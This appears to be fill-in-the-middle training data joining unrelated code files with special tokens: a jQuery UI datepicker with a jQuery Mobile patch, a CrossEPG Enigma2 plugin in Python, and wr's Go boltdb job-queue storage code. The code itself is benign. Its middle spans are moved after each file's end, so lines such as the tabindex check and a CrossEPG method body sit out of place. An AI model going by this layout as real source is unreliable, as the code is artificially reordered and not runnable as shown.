* Done via delegate so the binding only occurs once in the lifetime of the parent div. * Global datepicker_instActive, set by _updateDatepicker allows the handlers to find their way back to the active picker. */ function datepicker_bindHover(dpDiv) { var selector = "button, .ui-datepicker-prev, .ui-datepicker-next, .ui-datepicker-calendar td a"; return dpDiv.delegate(selector, "mouseout", function() { $(this).removeClass("ui-state-hover"); if (this.className.indexOf("ui-datepicker-prev") !== -1) { $(this).removeClass("ui-datepicker-prev-hover"); } if (this.className.indexOf("ui-datepicker-next") !== -1) { $(this).removeClass("ui-datepicker-next-hover"); } }) .delegate( selector, "mouseover", datepicker_handleMouseover ); } function datepicker_handleMouseover() { if (!$.datepicker._isDisabledDatepicker( datepicker_instActive.inline? datepicker_instActive.dpDiv.parent()[0] : datepicker_instActive.input[0])) { $(this).parents(".ui-datepicker-calendar").find("a").removeClass("ui-state-hover"); $(this).addClass("ui-state-hover"); if (this.className.indexOf("ui-datepicker-prev") !== -1) { $(this).addClass("ui-datepicker-prev-hover"); } if (this.className.indexOf("ui-datepicker-next") !== -1) { $(this).addClass("ui-datepicker-next-hover"); } } } /* jQuery extend now ignores nulls! */ function datepicker_extendRemove(target, props) { $.extend(target, props); for (var name in props) { if (props[name] == null) { target[name] = props[name]; } } return target; } /* Invoke the datepicker functionality. @param options string - a command, optionally followed by additional parameters or Object - settings for attaching new datepicker functionality @return jQuery object */ $.fn.datepicker = function(options){ /* Verify an empty collection wasn't passed - Fixes #6976 */ if ( !this.length ) { return this; } /* Initialise the date picker. */ if (!$.datepicker.initialized) { $(document).mousedown($.datepicker._checkExternalClick); $.datepicker.initialized = true; } /* Append datepicker main container to body if not exist. */ if ($("#"+$.datepicker._mainDivId).length === 0) { $("body").append($.datepicker.dpDiv); } var otherArgs = Array.prototype.slice.call(arguments, 1); if (typeof options === "string" && (options === "isDisabled" || options === "getDate" || options === "widget")) { return $.datepicker["_" + options + "Datepicker"]. apply($.datepicker, [this[0]].concat(otherArgs)); } if (options === "option" && arguments.length === 2 && typeof arguments[1] === "string") { return $.datepicker["_" + options + "Datepicker"]. apply($.datepicker, [this[0]].concat(otherArgs)); } return this.each(function() { typeof options === "string" ? $.datepicker["_" + options + "Datepicker"]. 
apply($.datepicker, [this].concat(otherArgs)) : $.datepicker._attachDatepicker(this, options); }); }; $.datepicker = new Datepicker(); // singleton instance $.datepicker.initialized = false; $.datepicker.uuid = new Date().getTime(); $.datepicker.version = "1.11.1"; var datepicker = $.datepicker; })); /* * jQuery Mobile: jQuery UI Datepicker Monkey Patch * http://salman-w.blogspot.com/2014/03/jquery-ui-datepicker-for-jquery-mobile.html */ (function() { // use a jQuery Mobile icon on trigger button $.datepicker._triggerClass += " ui-btn ui-btn-right ui-icon-carat-d ui-btn-icon-notext ui-corner-all"; // replace jQuery UI CSS classes with jQuery Mobile CSS classes in the generated HTML $.datepicker._generateHTML_old = $.datepicker._generateHTML; $.datepicker._generateHTML = function(inst) { return $("<div></div>").html(this._generateHTML_old(inst)) .find(".ui-datepicker-header").removeClass("ui-widget-header ui-helper-clearfix").addClass("ui-bar-inherit").end() .find(".ui-datepicker-prev").addClass("ui-btn ui-btn-left ui-icon-carat-l ui-btn-icon-notext").end() .find(".ui-datepicker-next").addClass("ui-btn ui-btn-right ui-icon-carat-r ui-btn-icon-notext").end() .find(".ui-icon.ui-icon-circle-triangle-e, .ui-icon.ui-icon-circle-triangle-w").replaceWith(function() { return this.childNodes; }).end() .find("span.ui-state-default").removeClass("ui-state-default").addClass("ui-btn").end() .find("a.ui-state-default.ui-state-active").removeClass("ui-state-default ui-state-highlight ui-priority-secondary ui-state-active").addClass("ui-btn ui-btn-active").end() .find("a.ui-state-default").removeClass("ui-state-default ui-state-highlight ui-priority-secondary").addClass("ui-btn").end() .find(".ui-datepicker-buttonpane").removeClass("ui-widget-content").end() .find(".ui-datepicker-current").removeClass("ui-state-default ui-priority-secondary").addClass("ui-btn ui-btn-inline ui-mini").end() .find(".ui-datepicker-close").removeClass("ui-state-default ui-priority-primary").addClass("ui-btn ui-btn-inline ui-mini").end() .html(); }; // replace jQuery UI CSS classes with jQuery Mobile CSS classes on the datepicker div, unbind mouseover and mouseout events on the datepicker div $.datepicker._newInst_old = $.datepicker._newInst; $.datepicker._newInst = function(target, inline) { var inst = this._newInst_old(target, inline); if (inst.dpDiv.hasClass("ui-widget")) { inst.dpDiv.removeClass("ui-widget ui-widget-content ui-helper-clearfix").addClass(inline ? "ui-content" : "ui-content ui-overlay-shadow ui-body-a").unbind("mouseover mouseout"); } return inst; }; })();<|fim▁end|>
var tabIndex = $.attr( element, "tabindex" ), isTabIndexNaN = isNaN( tabIndex ); return ( isTabIndexNaN || tabIndex >= 0 ) && focusable( element, !isTabIndexNaN );
<|file_name|>crossepg_main.py<|end_file_name|><|fim▁begin|>from __future__ import print_function from __future__ import absolute_import from enigma import * from Screens.MessageBox import MessageBox from Screens.Standby import TryQuitMainloop from . crossepglib import * from . crossepg_downloader import CrossEPG_Downloader from . crossepg_importer import CrossEPG_Importer from . crossepg_converter import CrossEPG_Converter from . crossepg_loader import CrossEPG_Loader from . crossepg_setup import CrossEPG_Setup from . crossepg_menu import CrossEPG_Menu from . crossepg_auto import CrossEPG_Auto class CrossEPG_Main: def __init__(self): self.config = CrossEPG_Config() self.patchtype = getEPGPatchType() def downloader(self, session): self.session = session CrossEPG_Auto.instance.lock = True CrossEPG_Auto.instance.stop() self.config.load() if self.config.configured == 0: self.session.openWithCallback(self.configureCallback, MessageBox, _("You need to configure crossepg before starting downloader.\nWould You like to do it now ?"), type=MessageBox.TYPE_YESNO) else: self.config.deleteLog() self.session.openWithCallback(self.downloadCallback, CrossEPG_Downloader, self.config.providers) def configureCallback(self, result): if result is True: self.session.open(CrossEPG_Setup) def loaderAsPlugin(self, session): self.session = session CrossEPG_Auto.instance.lock = True CrossEPG_Auto.instance.stop() self.loader() def downloadCallback(self, ret): if ret: if self.config.csv_import_enabled == 1: self.importer() else: if self.patchtype != 3: self.converter() else: self.loader() else: CrossEPG_Auto.instance.lock = False def importer(self): self.session.openWithCallback(self.importerCallback, CrossEPG_Importer) def importerCallback(self, ret): if ret: if self.patchtype != 3: self.converter() else: self.loader() else: CrossEPG_Auto.instance.lock = False def converter(self): self.session.openWithCallback(self.converterCallback, CrossEPG_Converter) def converterCallback(self, ret): if ret: if self.patchtype != -1: self.loader() else: if self.config.download_manual_reboot: self.session.open(TryQuitMainloop, 3) else: CrossEPG_Auto.instance.lock = False else: CrossEPG_Auto.instance.lock = False def loader(self): self.session.openWithCallback(self.loaderCallback, CrossEPG_Loader) def loaderCallback(self, ret): CrossEPG_Auto.instance.lock = False def setup(self, session, **kwargs):<|fim▁hole|> def setupCallback(self): CrossEPG_Auto.instance.lock = False CrossEPG_Auto.instance.doneConfiguring() crossepg_main = CrossEPG_Main()<|fim▁end|>
CrossEPG_Auto.instance.lock = True session.openWithCallback(self.setupCallback, CrossEPG_Menu)
<|file_name|>db.go<|end_file_name|><|fim▁begin|>// Copyright © 2016-2021 Genome Research Limited // Author: Sendu Bala <[email protected]>. // // This file is part of wr. // // wr is free software: you can redistribute it and/or modify // it under the terms of the GNU Lesser General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // wr is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public License // along with wr. If not, see <http://www.gnu.org/licenses/>. package jobqueue // This file contains functions for interacting with our database, which is // boltdb, a simple key/val store with transactions and hot backup ability. // We don't use a generic ORM for boltdb like Storm, because we can do custom // queries that are multiple times faster than what Storm can do. import ( "bytes" "context" "encoding/binary" "fmt" "io" "math" "os" "path/filepath" "sort" "strconv" "strings" "time" sync "github.com/sasha-s/go-deadlock" "github.com/wtsi-ssg/wr/clog" "github.com/VertebrateResequencing/muxfys/v4" "github.com/VertebrateResequencing/wr/internal" lru "github.com/hashicorp/golang-lru" "github.com/sb10/waitgroup" "github.com/ugorji/go/codec" bolt "go.etcd.io/bbolt" ) const ( dbDelimiter = "_::_" jobStatWindowPercent = float32(5) dbFilePermission = 0600 minimumTimeBetweenBackups = 30 * time.Second dbRunningTransactionsWaitTime = 1 * time.Minute ) var ( bucketJobsLive = []byte("jobslive") bucketJobsComplete = []byte("jobscomplete") bucketRTK = []byte("repgroupToKey") bucketRGs = []byte("repgroups") bucketLGs = []byte("limitgroups") bucketDTK = []byte("depgroupToKey") bucketRDTK = []byte("reverseDepgroupToKey") bucketEnvs = []byte("envs") bucketStdO = []byte("stdo") bucketStdE = []byte("stde") bucketJobRAM = []byte("jobRAM") bucketJobDisk = []byte("jobDisk") bucketJobSecs = []byte("jobSecs") wipeDevDBOnInit = true forceBackups = false ) // Rec* variables are only exported for testing purposes (*** though they should // probably be user configurable somewhere...). var ( RecMBRound = 100 // when we recommend amount of memory to reserve for a job, we round up to the nearest RecMBRound MBs RecSecRound = 1 // when we recommend time to reserve for a job, we round up to the nearest RecSecRound seconds ) // sobsd ('slice of byte slice doublets') implements sort interface so we can // sort a slice of []byte doublets, sorting on the first byte slice, needed for // efficient Puts in to the database. 
type sobsd [][2][]byte func (s sobsd) Len() int { return len(s) } func (s sobsd) Swap(i, j int) { s[i], s[j] = s[j], s[i] } func (s sobsd) Less(i, j int) bool { cmp := bytes.Compare(s[i][0], s[j][0]) return cmp == -1 } // sobsdStorer is the kind of function that stores the contents of a sobsd in // a particular bucket type sobsdStorer func(bucket []byte, encodes sobsd) (err error) type db struct { backupLast time.Time backupPath string backupPathTmp string ch codec.Handle backupStopWait chan bool backupMount *muxfys.MuxFys backupNotification chan bool backupWait time.Duration bolt *bolt.DB envcache *lru.ARCCache updatingAfterJobExit int wg *waitgroup.WaitGroup wgMutex sync.Mutex // protects wg since we want to call Wait() while another goroutine might call Add() sync.RWMutex backingUp bool backupFinal bool backupQueued bool backupsEnabled bool s3accessor *muxfys.S3Accessor closed bool slowBackups bool // just for testing purposes } // initDB opens/creates our database and sets things up for use. If dbFile // doesn't exist or seems corrupted, we copy it from backup if that exists, // otherwise we start fresh. // // dbBkFile can be an S3 url specified like: s3://[profile@]bucket/path/file // which will cause that s3 path to be mounted in the same directory as dbFile // and backups will be written there. // // In development we delete any existing db and force a fresh start. Backups // are also not carried out, so dbBkFile is ignored. func initDB(ctx context.Context, dbFile string, dbBkFile string, deployment string) (*db, string, error) { var backupsEnabled bool var accessor *muxfys.S3Accessor backupPathTmp := dbBkFile + ".tmp" var msg string if deployment == internal.Production || forceBackups { backupsEnabled = true if internal.InS3(dbBkFile) { if deployment == internal.Development { dbBkFile += "." 
+ deployment } path := strings.TrimPrefix(dbBkFile, internal.S3Prefix) pp := strings.Split(path, "@") profile := "default" if len(pp) == 2 { profile = pp[0] path = pp[1] } path = filepath.Dir(path) accessorConfig, err := muxfys.S3ConfigFromEnvironment(profile, path) if err != nil { return nil, "", err } accessor, err = muxfys.NewS3Accessor(accessorConfig) if err != nil { return nil, "", err } dbBkFile = filepath.Join(path, filepath.Base(dbBkFile)) dbBkFile, err = stripBucketFromS3Path(dbBkFile) if err != nil { return nil, "", err } backupPathTmp = dbFile + ".s3backup_tmp" if _, err = os.Stat(dbFile); os.IsNotExist(err) { err = accessor.DownloadFile(dbBkFile, dbFile) if err == nil { msg = "recreated missing db file " + dbFile + " from s3 backup file " + dbBkFile } } } } if wipeDevDBOnInit && deployment == internal.Development { errr := os.Remove(dbFile) if errr != nil && !os.IsNotExist(errr) { clog.Warn(ctx, "Failed to remove database file", "path", dbFile, "err", errr) } if accessor != nil { errr = accessor.DeleteFile(dbBkFile) } else { errr = os.Remove(dbBkFile) } if errr != nil && !os.IsNotExist(errr) { clog.Warn(ctx, "Failed to remove database backup file", "path", dbBkFile, "err", errr) } } var boltdb *bolt.DB var err error if _, err = os.Stat(dbFile); os.IsNotExist(err) { if _, err = os.Stat(dbBkFile); os.IsNotExist(err) { boltdb, err = bolt.Open(dbFile, dbFilePermission, nil) msg = "created new empty db file " + dbFile } else { err = copyFile(dbBkFile, dbFile) if err != nil { return nil, msg, err } boltdb, err = bolt.Open(dbFile, dbFilePermission, nil) msg = "recreated missing db file " + dbFile + " from backup file " + dbBkFile } } else { boltdb, err = bolt.Open(dbFile, dbFilePermission, nil) if err != nil { // try the backup bkPath := dbBkFile if accessor != nil { bkPath = backupPathTmp errdl := accessor.DownloadFile(dbBkFile, bkPath) if errdl != nil { msg = fmt.Sprintf("tried to recreate corrupt (?) db file %s "+ "from s3 backup file %s (error with original db file was: %s)", dbFile, dbBkFile, err) return nil, msg, errdl } defer func() { errr := os.Remove(bkPath) if errr != nil { clog.Warn(ctx, "failed to remove temporary s3 download of database backup", "err", errr) } }() } if _, errbk := os.Stat(bkPath); errbk == nil { boltdb, errbk = bolt.Open(bkPath, dbFilePermission, nil) if errbk == nil { origerr := err msg = fmt.Sprintf("tried to recreate corrupt (?) db file %s from backup file %s (error with original db file was: %s)", dbFile, dbBkFile, err) err = os.Remove(dbFile) if err != nil { return nil, msg, err } err = copyFile(bkPath, dbFile) if err != nil { return nil, msg, err } boltdb, err = bolt.Open(dbFile, dbFilePermission, nil) msg = fmt.Sprintf("recreated corrupt (?) 
db file %s from backup file %s (error with original db file was: %s)", dbFile, dbBkFile, origerr) } } } } if err != nil { return nil, msg, err } // ensure our buckets are in place err = boltdb.Update(func(tx *bolt.Tx) error { _, errf := tx.CreateBucketIfNotExists(bucketJobsLive) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketJobsLive, errf) } _, errf = tx.CreateBucketIfNotExists(bucketJobsComplete) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketJobsComplete, errf) } _, errf = tx.CreateBucketIfNotExists(bucketRTK) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketRTK, errf) } _, errf = tx.CreateBucketIfNotExists(bucketRGs) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketRGs, errf) } _, errf = tx.CreateBucketIfNotExists(bucketLGs) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketLGs, errf) } _, errf = tx.CreateBucketIfNotExists(bucketDTK) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketDTK, errf) } _, errf = tx.CreateBucketIfNotExists(bucketRDTK) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketRDTK, errf) } _, errf = tx.CreateBucketIfNotExists(bucketEnvs) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketEnvs, errf) } _, errf = tx.CreateBucketIfNotExists(bucketStdO) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketStdO, errf) } _, errf = tx.CreateBucketIfNotExists(bucketStdE) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketStdE, errf) } _, errf = tx.CreateBucketIfNotExists(bucketJobRAM) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketJobRAM, errf) } _, errf = tx.CreateBucketIfNotExists(bucketJobDisk) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketJobDisk, errf) } _, errf = tx.CreateBucketIfNotExists(bucketJobSecs) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketJobSecs, errf) } return nil }) if err != nil { return nil, msg, err } // we will cache frequently used things to avoid actual db (disk) access envcache, err := lru.NewARC(12) // we don't expect that many different ENVs to be in use at once if err != nil { return nil, msg, err } dbstruct := &db{ bolt: boltdb, envcache: envcache, ch: new(codec.BincHandle), backupsEnabled: backupsEnabled, backupPath: dbBkFile, backupPathTmp: backupPathTmp, backupNotification: make(chan bool), backupWait: minimumTimeBetweenBackups, backupStopWait: make(chan bool), s3accessor: accessor, wg: waitgroup.New(), } return dbstruct, msg, err } // storeLimitGroups stores a mapping of group names to unsigned ints in a // dedicated bucket. If a group was already in the database, and it had a // different value, that group name will be returned in the changed slice. If // the group is given with a value less than 0, it is not stored in the // database; any existing entry is removed and the name is returned in the // removed slice. 
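//
// A minimal usage sketch (group names and values here are made up for
// illustration; error handling elided):
//
//	changed, removed, err := db.storeLimitGroups(map[string]int{
//		"irods":  10, // limit jobs in this group to 10 at once
//		"legacy": -1, // negative value: delete any stored limit
//	})
//	// "irods" appears in changed only if it was previously stored with a
//	// different value; "legacy" appears in removed only if it was stored.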
func (db *db) storeLimitGroups(limitGroups map[string]int) (changed []string, removed []string, err error) { err = db.bolt.Batch(func(tx *bolt.Tx) error { b := tx.Bucket(bucketLGs) for group, limit := range limitGroups { key := []byte(group) v := b.Get(key) if v != nil { if limit < 0 { errd := b.Delete(key) if errd != nil { return errd } removed = append(removed, group) continue } if binary.BigEndian.Uint64(v) == uint64(limit) { continue } changed = append(changed, group) } else if limit < 0 { continue } v = make([]byte, 8) binary.BigEndian.PutUint64(v, uint64(limit)) errp := b.Put(key, v) if errp != nil { return errp } } return nil }) return changed, removed, err } // retrieveLimitGroup gets a value for a particular group from the db that was // stored with storeLimitGroups(). If the group wasn't stored, returns -1. func (db *db) retrieveLimitGroup(ctx context.Context, group string) int { v := db.retrieve(ctx, bucketLGs, group) if v == nil { return -1 } return int(binary.BigEndian.Uint64(v)) } // storeNewJobs stores jobs in the live bucket, where they will only be used for // disaster recovery. It also stores a lookup from the Job.RepGroup to the Job's // key, and since this is independent, and we call this prior to checking for // dups, we allow the same job to be looked up by multiple RepGroups. Likewise, // we store a lookup for the Job.DepGroups and .Dependencies.DepGroups(). // // If ignoreAdded is true, jobs that have already completed will be ignored // along with those that have been added and the returned alreadyAdded value // will increase. // // While storing it also checks if any previously stored jobs depend on a dep // group that an input job is a member of. If not, jobsToQueue return value will // be identical to the input job slice (minus any jobs ignored due to being // complete). Otherwise, if the affected job was Archive()d (and not currently // being re-run), then it will be appended to (a copy of) the input job slice // and returned in jobsToQueue. If the affected job was in the live bucket // (currently queued), it will be returned in the jobsToUpdate slice: you should // use queue methods to update the job in the queue. // // Finally, it triggers a background database backup. 
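//
// A hedged sketch of a call site (the real server code may differ):
//
//	toQueue, toUpdate, already, err := db.storeNewJobs(ctx, jobs, true)
//	// toQueue: jobs to add to the in-memory queue, possibly including
//	// resurrected parents that had completed but are now depended upon
//	// toUpdate: jobs already queued whose state should be updated via
//	// queue methods
//	// already: how many input jobs were skipped as previously added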
func (db *db) storeNewJobs(ctx context.Context, jobs []*Job, ignoreAdded bool) (jobsToQueue []*Job, jobsToUpdate []*Job, alreadyAdded int, err error) { encodedJobs, rgLookups, dgLookups, rdgLookups, rgs, jobsToQueue, jobsToUpdate, alreadyAdded, err := db.prepareNewJobs(jobs, ignoreAdded) if err != nil { return jobsToQueue, jobsToUpdate, alreadyAdded, err } if len(encodedJobs) > 0 { // now go ahead and store the lookups and jobs numStores := 2 if len(rgs) > 0 { numStores++ } if len(dgLookups) > 0 { numStores++ } if len(rdgLookups) > 0 { numStores++ } errors := make(chan error, numStores) db.wgMutex.Lock() wgk := db.wg.Add(1) go func() { defer internal.LogPanic(ctx, "jobqueue database storeNewJobs rglookups", true) defer db.wg.Done(wgk) sort.Sort(rgLookups) errors <- db.storeBatched(bucketRTK, rgLookups, db.storeLookups) }() if len(rgs) > 0 { wgk2 := db.wg.Add(1) go func() { defer internal.LogPanic(ctx, "jobqueue database storeNewJobs repGroups", true) defer db.wg.Done(wgk2) sort.Sort(rgs) errors <- db.storeBatched(bucketRGs, rgs, db.storeLookups) }() } if len(dgLookups) > 0 { wgk3 := db.wg.Add(1) go func() { defer internal.LogPanic(ctx, "jobqueue database dgLookups", true) defer db.wg.Done(wgk3) sort.Sort(dgLookups) errors <- db.storeBatched(bucketDTK, dgLookups, db.storeLookups) }() } if len(rdgLookups) > 0 { wgk4 := db.wg.Add(1) go func() { defer internal.LogPanic(ctx, "jobqueue database storeNewJobs rdgLookups", true) defer db.wg.Done(wgk4) sort.Sort(rdgLookups) errors <- db.storeBatched(bucketRDTK, rdgLookups, db.storeLookups) }() } wgk5 := db.wg.Add(1) go func() { defer internal.LogPanic(ctx, "jobqueue database storeNewJobs encodedJobs", true) defer db.wg.Done(wgk5) sort.Sort(encodedJobs) errors <- db.storeBatched(bucketJobsLive, encodedJobs, db.storeEncodedJobs) }() db.wgMutex.Unlock() seen := 0 for thisErr := range errors { if thisErr != nil { err = thisErr } seen++ if seen == numStores { close(errors) break } } } // *** on error, because we were batching, and doing lookups separately to // each other and jobs, we should go through and remove anything we did // manage to add... 
(but this isn't so critical, since on failure here, // they are not added to the in-memory queue and user gets an error and they // would try to add everything back again; conversely, if we try to retrieve // non-existent jobs based on lookups that shouldn't be there, they are // silently skipped) if err == nil && alreadyAdded != len(jobs) { db.backgroundBackup(ctx) } return jobsToQueue, jobsToUpdate, alreadyAdded, err } func (db *db) prepareNewJobs(jobs []*Job, ignoreAdded bool) (encodedJobs, rgLookups, dgLookups, rdgLookups, rgs sobsd, jobsToQueue []*Job, jobsToUpdate []*Job, alreadyAdded int, err error) { // turn the jobs in to sobsd and sort by their keys, likewise for the // lookups repGroups := make(map[string]bool) depGroups := make(map[string]bool) newJobKeys := make(map[string]bool) var keptJobs []*Job for _, job := range jobs { keyStr := job.Key() if ignoreAdded { var added bool added, err = db.checkIfAdded(keyStr) if err != nil { return encodedJobs, rgLookups, dgLookups, rdgLookups, rgs, jobsToQueue, jobsToUpdate, alreadyAdded, err } if added { alreadyAdded++ continue } keptJobs = append(keptJobs, job) } newJobKeys[keyStr] = true key := []byte(keyStr) job.RLock() rgLookups = append(rgLookups, [2][]byte{db.generateLookupKey(job.RepGroup, key), nil}) repGroups[job.RepGroup] = true for _, depGroup := range job.DepGroups { if depGroup != "" { dgLookups = append(dgLookups, [2][]byte{db.generateLookupKey(depGroup, key), nil}) depGroups[depGroup] = true } } for _, depGroup := range job.Dependencies.DepGroups() { rdgLookups = append(rdgLookups, [2][]byte{db.generateLookupKey(depGroup, key), nil}) } job.RUnlock() var encoded []byte enc := codec.NewEncoderBytes(&encoded, db.ch) job.RLock() err = enc.Encode(job) job.RUnlock() if err != nil { return encodedJobs, rgLookups, dgLookups, rdgLookups, rgs, jobsToQueue, jobsToUpdate, alreadyAdded, err } encodedJobs = append(encodedJobs, [2][]byte{key, encoded}) } if len(encodedJobs) > 0 { if !ignoreAdded { keptJobs = jobs } // first determine if any of these new jobs are the parent of previously // stored jobs if len(depGroups) > 0 { jobsToQueue, jobsToUpdate, err = db.retrieveDependentJobs(depGroups, newJobKeys) // arrange to have resurrected complete jobs stored in the live // bucket again for _, job := range jobsToQueue { key := []byte(job.Key()) var encoded []byte enc := codec.NewEncoderBytes(&encoded, db.ch) job.RLock() err = enc.Encode(job) job.RUnlock() if err != nil { return encodedJobs, rgLookups, dgLookups, rdgLookups, rgs, jobsToQueue, jobsToUpdate, alreadyAdded, err } encodedJobs = append(encodedJobs, [2][]byte{key, encoded}) } if len(jobsToQueue) > 0 { jobsToQueue = append(jobsToQueue, jobs...) } else { jobsToQueue = keptJobs } } else { jobsToQueue = keptJobs } for rg := range repGroups { rgs = append(rgs, [2][]byte{[]byte(rg), nil}) } } return encodedJobs, rgLookups, dgLookups, rdgLookups, rgs, jobsToQueue, jobsToUpdate, alreadyAdded, err } // generateLookupKey creates a lookup key understood by the retrieval methods, // concatenating prefix with a delimiter and the job key. func (db *db) generateLookupKey(prefix string, jobKey []byte) []byte { key := append([]byte(prefix), []byte(dbDelimiter)...) return append(key, jobKey...) } // checkIfLive tells you if a job with the given key is currently in the live // bucket. 
func (db *db) checkIfLive(key string) (bool, error) { var isLive bool err := db.bolt.View(func(tx *bolt.Tx) error { newJobBucket := tx.Bucket(bucketJobsLive) if newJobBucket.Get([]byte(key)) != nil { isLive = true } return nil }) return isLive, err } // checkIfAdded tells you if a job with the given key is currently in the // complete bucket or the live bucket. func (db *db) checkIfAdded(key string) (bool, error) { var isInDB bool err := db.bolt.View(func(tx *bolt.Tx) error { newJobBucket := tx.Bucket(bucketJobsLive) completeJobBucket := tx.Bucket(bucketJobsComplete) if newJobBucket.Get([]byte(key)) != nil || completeJobBucket.Get([]byte(key)) != nil { isInDB = true } return nil }) return isInDB, err } // archiveJob deletes a job from the live bucket, and adds a new version of it // (with different properties) to the complete bucket. // // Also does what updateJobAfterExit does, except for the storage of any new // stdout/err. // // The key you supply must be the key of the job you supply, or bad things will // happen - no checking is done! A backgroundBackup() is triggered afterwards. func (db *db) archiveJob(ctx context.Context, key string, job *Job) error { var encoded []byte enc := codec.NewEncoderBytes(&encoded, db.ch) job.RLock() err := enc.Encode(job) job.RUnlock() if err != nil { return err } err = db.bolt.Batch(func(tx *bolt.Tx) error { bo := tx.Bucket(bucketStdO) be := tx.Bucket(bucketStdE) key := []byte(key) errf := bo.Delete(key) if errf != nil { return errf } errf = be.Delete(key) if errf != nil { return errf } b := tx.Bucket(bucketJobsLive) errf = b.Delete(key) if errf != nil { return errf } b = tx.Bucket(bucketJobsComplete) errf = b.Put(key, encoded) if errf != nil { return errf } b = tx.Bucket(bucketJobRAM) errf = b.Put([]byte(fmt.Sprintf("%s%s%20d", job.ReqGroup, dbDelimiter, job.PeakRAM)), []byte(strconv.Itoa(job.PeakRAM))) if errf != nil { return errf } b = tx.Bucket(bucketJobDisk) errf = b.Put([]byte(fmt.Sprintf("%s%s%20d", job.ReqGroup, dbDelimiter, job.PeakDisk)), []byte(strconv.Itoa(int(job.PeakDisk)))) if errf != nil { return errf } b = tx.Bucket(bucketJobSecs) secs := int(math.Ceil(job.EndTime.Sub(job.StartTime).Seconds())) return b.Put([]byte(fmt.Sprintf("%s%s%20d", job.ReqGroup, dbDelimiter, secs)), []byte(strconv.Itoa(secs))) }) db.backgroundBackup(ctx) return err } // deleteLiveJob removes a job from the live bucket, for use when jobs were // added in error. func (db *db) deleteLiveJob(ctx context.Context, key string) { db.remove(ctx, bucketJobsLive, key) db.backgroundBackup(ctx) //*** we're not removing the lookup entries from the bucket*TK buckets... } // deleteLiveJobs removes multiple jobs from the live bucket. func (db *db) deleteLiveJobs(ctx context.Context, keys []string) error { err := db.bolt.Batch(func(tx *bolt.Tx) error { b := tx.Bucket(bucketJobsLive) for _, key := range keys { errd := b.Delete([]byte(key)) if errd != nil { return errd } } return nil }) if err != nil { return err } db.backgroundBackup(ctx) //*** we're not removing the lookup entries from the bucket*TK buckets... return nil } // recoverIncompleteJobs returns all jobs in the live bucket, for use when // restarting the server, allowing you to start working on any jobs that were // stored with storeNewJobs() but not yet archived with archiveJob(). // // Note that you will get back the job as it was in its last recorded state. // The state is recorded when a job starts to run, when it exits, and when it // is kicked.
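//
// Sketch of recovery during server startup (the surrounding code is an
// assumption for illustration):
//
//	jobs, err := db.recoverIncompleteJobs()
//	if err == nil {
//		for _, job := range jobs {
//			// re-add job to the in-memory queue in its last
//			// recorded state
//		}
//	}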
func (db *db) recoverIncompleteJobs() ([]*Job, error) { var jobs []*Job err := db.bolt.View(func(tx *bolt.Tx) error { b := tx.Bucket(bucketJobsLive) return b.ForEach(func(key, encoded []byte) error { if encoded != nil { dec := codec.NewDecoderBytes(encoded, db.ch) job := &Job{} errf := dec.Decode(job) if errf != nil { return errf } jobs = append(jobs, job) } return nil }) }) return jobs, err } // retrieveCompleteJobsByKeys gets jobs with the given keys from the completed // jobs bucket (ie. those that have gone through the queue and been Remove()d). func (db *db) retrieveCompleteJobsByKeys(keys []string) ([]*Job, error) { var jobs []*Job err := db.bolt.View(func(tx *bolt.Tx) error { b := tx.Bucket(bucketJobsComplete) for _, key := range keys { encoded := b.Get([]byte(key)) if encoded != nil { dec := codec.NewDecoderBytes(encoded, db.ch) job := &Job{} err := dec.Decode(job) if err == nil { jobs = append(jobs, job) } } } return nil }) return jobs, err } // retrieveRepGroups gets the rep groups of all jobs that have ever been added. func (db *db) retrieveRepGroups() ([]string, error) { var rgs []string err := db.bolt.View(func(tx *bolt.Tx) error { b := tx.Bucket(bucketRGs) return b.ForEach(func(k, v []byte) error { rgs = append(rgs, string(k)) return nil }) }) return rgs, err } // retrieveCompleteJobsByRepGroup gets jobs with the given RepGroup from the // completed jobs bucket (ie. those that have gone through the queue and been // Archive()d), but not those that are also currently live (ie. are being // re-run). func (db *db) retrieveCompleteJobsByRepGroup(repgroup string) ([]*Job, error) { var jobs []*Job err := db.bolt.View(func(tx *bolt.Tx) error { newJobBucket := tx.Bucket(bucketJobsLive) completeJobBucket := tx.Bucket(bucketJobsComplete) lookupBucket := tx.Bucket(bucketRTK).Cursor() prefix := []byte(repgroup + dbDelimiter) for k, _ := lookupBucket.Seek(prefix); bytes.HasPrefix(k, prefix); k, _ = lookupBucket.Next() { key := bytes.TrimPrefix(k, prefix) encoded := completeJobBucket.Get(key) if len(encoded) > 0 && newJobBucket.Get(key) == nil { dec := codec.NewDecoderBytes(encoded, db.ch) job := &Job{} err := dec.Decode(job) if err != nil { return err } jobs = append(jobs, job) } } return nil }) return jobs, err } // retrieveDependentJobs gets previously stored jobs that had a dependency on // one of the input depGroups. If the job is found in the live bucket, then it // is returned in the jobsToUpdate return value. If it is found in the complete // bucket, and is not true in the supplied newJobKeys map, then it is returned // in the jobsToQueue return value.
